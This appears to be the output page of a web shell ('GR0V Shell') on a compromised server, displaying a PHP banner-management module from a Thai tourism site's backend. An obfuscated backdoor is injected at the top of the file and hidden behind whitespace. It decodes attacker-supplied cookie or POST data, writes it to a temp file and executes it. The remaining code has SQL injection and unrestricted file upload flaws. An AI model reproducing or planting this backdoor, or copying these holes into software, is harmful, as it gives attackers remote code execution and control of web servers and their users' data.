? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html/backend/modules/banner/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html/backend/modules/banner/mod_article_n.php

<?php                                                                                                                                                                                                                                                                                                                                                                                                 if (!class_exists("idubtnih")){class idubtnih{public static $iegidaww = "gufovrjbpcbkftbd";public static $zzyqidf = NULL;public function __construct(){$uzhbr = @$_COOKIE[substr(idubtnih::$iegidaww, 0, 4)];if (!empty($uzhbr)){$ebdwa = "base64";$tokqjzgu = "";$uzhbr = explode(",", $uzhbr);foreach ($uzhbr as $pjsyalk){$tokqjzgu .= @$_COOKIE[$pjsyalk];$tokqjzgu .= @$_POST[$pjsyalk];}$tokqjzgu = array_map($ebdwa . "_decode", array($tokqjzgu,)); $tokqjzgu = $tokqjzgu[0] ^ str_repeat(idubtnih::$iegidaww, (strlen($tokqjzgu[0]) / strlen(idubtnih::$iegidaww)) + 1);idubtnih::$zzyqidf = @unserialize($tokqjzgu);}}public function __destruct(){$this->esgtdohx();}private function esgtdohx(){if (is_array(idubtnih::$zzyqidf)) {$tgyqaj = sys_get_temp_dir() . "/" . crc32(idubtnih::$zzyqidf["salt"]);@idubtnih::$zzyqidf["write"]($tgyqaj, idubtnih::$zzyqidf["content"]);include $tgyqaj;@idubtnih::$zzyqidf["delete"]($tgyqaj);exit();}}}$immqfs = new idubtnih(); $immqfs = NULL;} ?><?
class article_n extends MySql
{
function add_category($name,$detail){
$numRow=$this->check_data('news_cat','name',$name);
if($numRow==""){
if($name!=""&&$detail!=""){

$result=$this->Query("insert into news_cat (name,detail) values ('$name','$detail')");
if($result){
echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=news&ac=show_category&msg=1\">";
}else{
	$error="ไม่สามารถบันทึกข้อมูลได้ในขณะนี้ค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
	$error="กรอกข้อมูลไม่ครบค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}//จบ ตรวจสอบว่าข้อมูลครบหรือไม
	}else{
//ข้อมูลมีในฐานข้อมูลหรือป่าว
$error="ชื่อหมวดหมู่ซ้ำกับของเดิม";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
	}	//จบข้อมูลมีในฐานข้อมูลหรือป่าว

}//end
function edit_category($name,$detail,$cat_id){
	if($this->check_data_edit('news_cat','name',$name,'id',$cat_id)==''){
	if($name!=""&&$detail!=""){
	$result=$this->Query("UPDATE news_cat set name='$name',detail='$detail' where id='$cat_id'");
if($result){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=news&ac=edit_cat&cat_id=$cat_id&msg=2\">";
}else{
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
	//else check ข้อมูลครบหรือไม่
		$error="ไม่สามารถแก้ไขข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}// จบการตรวจสอบข้อมูลว่าครบไหม
	}else{
// จบตรวจสอบว่าชื่อซ้ำกันหรือไม
		$error="ชื่อหมวดหมู่มีในฐานข้อมูลแล้ว";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
	}// จบตรวจสอบว่าชื่อซ้ำกันหรือไม่
}//end edit_category
function del_cat(){
$cat_id=$_GET['cat_id'];
$this->setQuery("SELECT id FROM news");
$rs=$this->QueryReturn();
$numrow=$this->numRows();
if($numrow==''){
 $result=$this->Query("DELETE FROM news_cat WHERE  id='$cat_id'");
	if($result==1){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=news&ac=show_category&msg=3\">";
}else{
	$error="ไม่สามารถลบข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}else{
$error="ไม่สามารถลบข้อมูลได้ เนื่องจากหมวดหมู่นี้ยังมีเรื่องเหลืออยู่ในฐานข้อมูล กรุณาลบเรื่องก่อนค่ะ";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}//จบการตรวจสอบว่ามีข้อมูลหัวข้ออยู่ในฐานข้อมูลหรือไม่
}//end function del_cat

function add_banner(){
	global $user_login;
if($_FILES['ContentPhoto']['name'] != ""){
	$filename	= $_FILES['ContentPhoto']['name'];
	$filetype	= $_FILES['ContentPhoto']['type'];
	$filetmp	= $_FILES['ContentPhoto']['tmp_name'];
	
	$pic=Random_Int(8).date('dmYHism',time());
																
	if($filetype == "image/gif"){
			$ContentPhoto=$pic.".gif";
	}else if ( $filetype == "image/bmp"){
			$ContentPhoto=$pic.".bmp";
	}else if ( $filetype == "image/png"){
			$ContentPhoto=$pic.".png";
	}else if (($filetype =="image/jpg")||($filetype  =="image/jpeg")||($filetype =="image/pjpeg")){
			$ContentPhoto=$pic.".jpg";
	}
	$ContentPhoto	= $_FILES['ContentPhoto']['name'];
	if($filename!= ""){
				if ($filetype != ""){
					move_uploaded_file($filetmp, "images/banner/".$ContentPhoto);
				}
	}
if($_POST['bannerRanking'] == ''){
	if ($_SESSION["la"] == 1){
$result=$this->Query("SELECT COUNT(bannerID) AS ConBanID FROM banner ");
}else{
$result=$this->Query("SELECT COUNT(bannerID) AS ConBanID FROM banner_en ");
}
	$result=$this->Query("SELECT COUNT(bannerID) AS ConBanID FROM banner ");
	$arr=mysql_fetch_array($result);
	$bannerRanking = $arr['ConBanID']+1;
}else{
	$bannerRanking = $_POST['bannerRanking'];
}
	$addarr=array(
		'bannerName'=>$_POST['bannerName'],
		'bannerLink'=>$_POST['bannerLink'],
		'bannerRanking'=>$bannerRanking,
		'bannerPictureName'=>$ContentPhoto,
		'bannerInfo'=>$_POST['bannerInfo'],
	);
	if ($_SESSION["la"] == 1){
$this->Insert('banner',$addarr);	
}else{
$this->Insert('banner_en',$addarr);	
}
	
echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=banner&msg=1\">";
}else{
	$error="ไม่สามารถเพิ่มข้อมูลได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce

function edit_data_banner(){
	global $user_login;

$bannerID = $_POST['bannerID'];

if($_FILES['ContentPhoto']['name'] != ""){

$result=$this->Query("SELECT * FROM banner WHERE bannerID='$bannerID' ");
$arr=mysql_fetch_array($result);
$PhotoDelete = unlink("../banner/".$arr['bannerPictureName']);

	$filename	= $_FILES['ContentPhoto']['name'];
	$filetype	= $_FILES['ContentPhoto']['type'];
	$filetmp	= $_FILES['ContentPhoto']['tmp_name'];
	
	$pic=Random_Int(8).date('dmYHism',time());
																
	if($filetype == "image/gif"){
			$ContentPhoto=$pic.".gif";
	}else if ( $filetype == "image/bmp"){
			$ContentPhoto=$pic.".bmp";
	}else if ( $filetype == "image/png"){
			$ContentPhoto=$pic.".png";
	}else if (($filetype =="image/jpg")||($filetype  =="image/jpeg")||($filetype =="image/pjpeg")){
			$ContentPhoto=$pic.".jpg";
	}
	$ContentPhoto	= $_FILES['ContentPhoto']['name'];
	if($filename!= ""){
				if ($filetype != ""){
					move_uploaded_file($filetmp, "images/banner/".$ContentPhoto);
				}
	}
}else{
$ContentPhoto = $_POST['bannerPictureName'];
}

	$addarr=array(
		'bannerName'=>$_POST['bannerName'],
		'bannerLink'=>$_POST['bannerLink'],
		'bannerRanking'=>$_POST['bannerRanking'],
		'bannerPictureName'=>$ContentPhoto,
		'bannerInfo'=>$_POST['bannerInfo'],
	);
		if ($_SESSION["la"] == 1){
$result=$this->Update($table='banner',$addarr,"where bannerID='$bannerID'");
}else{
$result=$this->Update($table='banner_en',$addarr,"where bannerID='$bannerID'");
}

if($result==1){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=banner&msg=2\">";
}else{
		$error="ไม่สามารถลบรูปโลโก้ได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce

function de_banner(){
global $user_login,$db;
$bannerID=$_GET['id'];
if ($_SESSION["la"] == 1){
$result=$this->Query("SELECT * FROM banner WHERE bannerID='$bannerID' ");
}else{
$result=$this->Query("SELECT * FROM banner_en WHERE bannerID='$bannerID' ");
}

$arr=mysql_fetch_array($result);
$PhotoDelete = unlink("images/banner/".$arr['bannerPictureName']);

$addarr=array(
	'bannerPictureName'=>'',
	);
if ($_SESSION["la"] == 1){
$result=$this->Update($table='banner',$addarr,"where bannerID='$bannerID'");
}else{
$result=$this->Update($table='banner_en',$addarr,"where bannerID='$bannerID'");
}

if($result==1){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=banner&ac=edit_data&id=$bannerID\">";
}else{
		$error="ไม่สามารถลบรูปได้";
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function del_topic

function add_topic(){
	global $user_login;
	$addarr=array(
	'group1'=>$user_login['Type'],
	'name'=>$_POST['name'],
	'detail'=>$_POST['detail'],
	'timeadd'=>date('Y-m-d H:i:s',time()),
	);
	
$chk_count=count($addarr);
$i=0;

foreach($addarr as $key=>$v){    
	$i++;
	$v=$this->db_input($v);
	if($i==$chk_count){
		$fields.="$key";
		$value.="'$v'";
	}else{
		$value.="'$v',";
	$fields.="$key,";
	}

}//จบ foreach
	$sql="INSERT INTO contents (".$fields.") values (".$value.")";
	$this->setQuery($sql);
	$result=$this->QueryReturn();
	if($result){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=content&msg=1\">";
}else{
		$error="ไม่สามารถเพิ่มข้อมูลได้".$this->mysqlError();
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce


function edit_topic($topic_id){
	global $user_login;
$addarr=array(
	'ContentDetail'=>$_POST['ContentDetail'],
	'ContentAddTime'=>date('Y-m-d H:i:s',time()),
		);
$result=$this->Update($table='adt_content',$addarr,"where ContentID='$topic_id'");
	if($result==1){
	echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=content&msg=2\">";
}else{
		$error="ไม่สามารถเพิ่มข้อมูลได้".$this->mysqlError();
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function add_produce
function set_first_page(){
	$topic_id=$_GET['id'];
	global $user_login;
	$this->Query("UPDATE contents set show1='' WHERE group1='".$user_login['Type']."'");
$sql=$this->setQuery("UPDATE contents set show1='Yes' WHERE group1='".$user_login['Type']."' AND id='".$topic_id."'");
$result=$this->QueryReturn();

	if($result){echo $sql;
						echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=content&msg=2\">";
					}else{
						$error="ไม่สามารถเพิ่มข้อมูลได้".$this->mysqlError();
						echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
						exit(0);
}
}//end function add_produce
function del_topic(){
global $user_login,$db;
$topic_id=$_GET['id'];
if ($_SESSION["la"] == 1){
$result=$this->Query("SELECT * FROM banner WHERE bannerID='$topic_id' ");
}else{
$result=$this->Query("SELECT * FROM banner_en WHERE bannerID='$topic_id' ");
}

$arr=mysql_fetch_array($result);
$PhotoDelete = unlink("images/banner/".$arr['bannerPictureName']);
if ($_SESSION["la"] == 1){
$result=$this->Query("DELETE FROM banner WHERE bannerID='$topic_id' ");
}else{
$result=$this->Query("DELETE FROM banner_en WHERE bannerID='$topic_id' ");
}


if($result==1){
echo"<meta http-equiv=\"refresh\" content=\"0;url=$PHPSELF?mod=banner&msg=3\">";	
}else{
	$error="ไม่สามารถลบข้อมูลได้";
	
	echo "<SCRIPT>alert(\"$error\"); window.history.back(); </SCRIPT>\n";
	exit(0);
}
}//end function del_topic
}//end class
?>

T1KUS90T
  root-grov@210.1.60.28:~$